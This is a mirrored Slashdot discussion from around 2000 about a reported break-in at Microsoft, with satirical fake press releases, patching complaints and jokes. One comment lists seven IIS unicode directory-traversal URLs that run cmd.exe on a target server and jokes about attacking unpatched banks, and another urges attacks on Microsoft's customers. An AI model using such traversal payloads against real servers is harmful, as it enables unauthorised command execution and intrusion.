Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Cracked again?

Posted by ryuzaki0 on from the isn't-that-special dept.

Dominic writes: "Seems microsoft have been hacked (possibly) again, acording to infoworld." They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).

11 of 185 comments (clear)

  1. Cracking Microsoft is a bad idea. by paai · · Score: 5

    What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
    ... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
    So mess with the customers of Microsoft as much as you want, embarass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.

  2. Patches and Absolute Certainty by Lostman · · Score: 4

    "It's hard to give you an absolute certainty that the patch had been applied across the board. Given today's incident, our security teams are going back to check out the systems."

    This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow virus's to spread have their only fix with these Patches, and that -- according to even Microsoft -- its hard to make sure that the patches our applied completely: we should worry.

    One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.

    I am asking You All: What ways could we make sure that "patches" had been applied across the board?

  3. Re:Which server by ryanr · · Score: 4

    I was given a copy of a small log that Dimitri shared with the IDG reporter. Egg.microsoft.com was not one of the servers mentioned.

    And yes, the exploit was nearly identical to one of the lines you mentioned above.

    (The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)

  4. You better not see it... by Cid+Highwind · · Score: 5

    ...source code to Windows and Office was supposedly stolen (I'll believe that when I see it)

    Unfortunately, persuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.

    If you do recieve the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.

    We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humourous. Stop lauging, we mean it

    --
    0 1 - just my two bits
  5. Re:ummm.... by xinit · · Score: 4
    How's this for a conspiracy theory;

    Monday November 27, 9:00 am Eastern Time

    Press Release

    Microsoft Eliminates Security Problems related to Linux 'Hacker OS'

    Redmond, Wa--(BUSINESS WIRE)--Nov. 27, 2000--Microsoft Corp. (Nasdaq NMS: MSFT) today announced that it has discovered the reasons behind the recent web breakins that have plagued them, and since eliminated them.

    "We have been working for the past month performing an audit of all of our systems that could have been the source of the leak. We found that one of our corporate file servers had been replaced with one of those Linux boxes running Samba. Someone in our intranet development team thought that it would be a good way to keep his budget in line. Well, he knows better now, introducing an insecure free 'operating system' like that in our network - it's a career limiting move." stated Phil Todd, PR spokesperson for Microsoft.

    Phil goes on to describe how a malicious hacker was able to remotely cause the source code in the Linux Computer to send him the Confidential Windows Source Code (tm). Linux 'Kernel Hackers' as they call themselves often do this kind of modification in order to make corporate firewalls useless. "You just never know what is in those free systems. There's nobody you can sue if things go wrong!" Phil added incredulously.

    Microsoft has since removed the offensive machine and replaced it with a Real Windows 2000 File Server. "Sure, some people say it's slower this way, but they're just misinformed. At least it's SECURE."

    About Microsoft

    Founded in 1975, Microsoft (Nasdaq ``MSFT'') is the worldwide leader in software for personal computers and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. Microsoft is a registered trademark of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners.

    --
    --- http://foo.ca
  6. Microsoft's Servers != Microsoft Windows by xee · · Score: 5

    Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populus. In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.


    -------

    --
    Oh shit! I forgot to click "Post Anonymously"...
  7. In other news... by zelyan · · Score: 5
    And in other news today, a politician lied, astronomers discovered an asteroid that has a 1000-to-1 chance of hitting Earth, and the Napster suit is still ongoing. Industry experts expect that the stock market will continue existing and the dot-coms "might go up, might go down, nobody really knows why they do anything, anyway" said one macro economist.

    President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.

    Jeff

  8. Which server by x-empt · · Score: 5

    I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.

    He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.

    http://target/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%9v../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%af../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%qf../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%8s../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%9c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%pc../winnt/system32/ cmd.exe?/c+dir

    Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!

    --
    Ever need an online dictionary?
  9. Script-kiddies and car-thieves by mangu · · Score: 4
    Following a simple analogy to your reasoning, if no car manufacturer ever publishes their design details, how do criminals find out how to start the engine without the key? Simply put, it takes an engineer to design something, but any punk can find out a way to break things.

    You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intrincacies of software they would not be script-kiddies.

    Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.

  10. Big deal by Anonymous Coward · · Score: 4

    I haxored kernel.org and downloaded the linux source code

  11. MS Servers by Anonymous Coward · · Score: 5
    I love it, I absolutely love it. Sys admins are always being told that it's their fault for being hacked because they hadn't kept up on the latest patches. Now MS is whining and complaining that it's too hard to apply all those patches to all those servers. The message I'm getting is this:

    1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.

    Did I miss anything?